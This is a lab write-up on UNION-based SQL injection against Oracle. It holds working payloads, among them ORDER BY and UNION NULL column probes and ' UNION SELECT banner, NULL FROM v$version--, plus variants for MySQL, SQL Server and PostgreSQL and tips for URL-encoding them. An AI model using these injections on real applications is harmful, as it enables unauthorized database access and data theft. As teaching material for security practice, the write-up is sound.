Lab 7: SQL injection attack, querying the database type and version on Oracle

Problem Statement:

This lab contains an SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.

To solve the lab, display the database version string.

Requirements:

Make the database retrieve the strings: 'Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production, PL/SQL Release 11.2.0.2.0 - Production, CORE 11.2.0.2.0 Production, TNS for Linux: Version 11.2.0.2.0 - Production, NLSRTL Version 11.2.0.2.0 - Production'

Solution:

There are several ways to read the database version; which query works depends on the database engine behind the application, for example Microsoft SQL Server versus Oracle, so the first thing to establish is which one you are talking to.

On Microsoft SQL Server and MySQL the version is exposed through the @@version variable:

SELECT @@version

On Oracle it is read from the v$version view, which returns one banner row per component (database, PL/SQL, CORE, TNS, NLSRTL), which is why the lab expects five strings:

SELECT banner FROM v$version

Steps followed:

  1. Same method as before. First use ORDER BY 1, ORDER BY 2, etc. in the category parameter; the first value that produces an error is one more than the number of columns the original query returns (two in this lab). Note that on Oracle every SELECT needs a FROM clause, so if you instead probe with UNION SELECT NULL, NULL you must add FROM dual (Oracle's built-in dummy table) or the probe itself will fail with a syntax error.
  2. Next, use a UNION attack to pull the banner rows into the first (string) column of the results, and terminate the rest of the original query with a comment so the application's trailing quote does not break the statement:

' UNION SELECT BANNER, NULL FROM V$VERSION--

Each row of v$version then appears in the product list, which is what the lab checks for.
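The full sequence of queries that results from the steps above, written out as an added worked example (this is not code from the original post). It assumes the category filter builds its SQL by string concatenation into a statement of the form SELECT name, description FROM products WHERE category = '<input>'; the table and column names are assumptions, the lab never shows them. The equivalents for the other engines mentioned in the version-query section are given as comments at the end.

```sql
-- Added example: what the back end executes for each injected category value.
-- Assumed (not shown by the lab) original query:
--   SELECT name, description FROM products WHERE category = '<input>'
-- The trailing ' after each -- is the application's own closing quote, now
-- neutralised by the comment. Table/column names are assumptions.

-- 1. Count the columns with ORDER BY. Oracle raises ORA-01785 ("ORDER BY item
--    must be the number of a SELECT-list expression") on the first value that
--    exceeds the column count, so ORDER BY 3 failing means two columns.
SELECT name, description FROM products WHERE category = 'Gifts' ORDER BY 1--';
SELECT name, description FROM products WHERE category = 'Gifts' ORDER BY 2--';
SELECT name, description FROM products WHERE category = 'Gifts' ORDER BY 3--';  -- ORA-01785

-- 2. Same count via UNION NULL probing. Oracle requires a FROM clause on every
--    SELECT, so the probe selects from DUAL; without "FROM dual" this is a
--    syntax error (ORA-00923) rather than a column-count signal.
SELECT name, description FROM products WHERE category = '' UNION SELECT NULL, NULL FROM dual--';

-- 3. Check that the first column accepts a string. A mismatch in a UNION
--    raises ORA-01790 ("expression must have same datatype as corresponding
--    expression"), so a clean response here means column 1 is text.
SELECT name, description FROM products WHERE category = '' UNION SELECT 'a', NULL FROM dual--';

-- 4. Retrieve the version. v$version needs no DUAL because it is a real view;
--    each banner row comes back as an extra "product" in the page. The value
--    sent in the category parameter is:  ' UNION SELECT banner, NULL FROM v$version--
SELECT name, description FROM products WHERE category = '' UNION SELECT banner, NULL FROM v$version--';

-- Equivalent final payloads on other engines (for comparison only):
-- Microsoft SQL Server:  ' UNION SELECT @@version, NULL--
-- MySQL:                 ' UNION SELECT @@version, NULL#     (or "-- " with a trailing space)
-- PostgreSQL:            ' UNION SELECT version(), NULL--
```

When sending these through the browser or Burp, URL-encode the payload (spaces as +, # as %23 on MySQL), otherwise the query string is cut or the comment marker is lost before it reaches the database.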

Example from a MySQL database (screenshot not reproduced in this text)
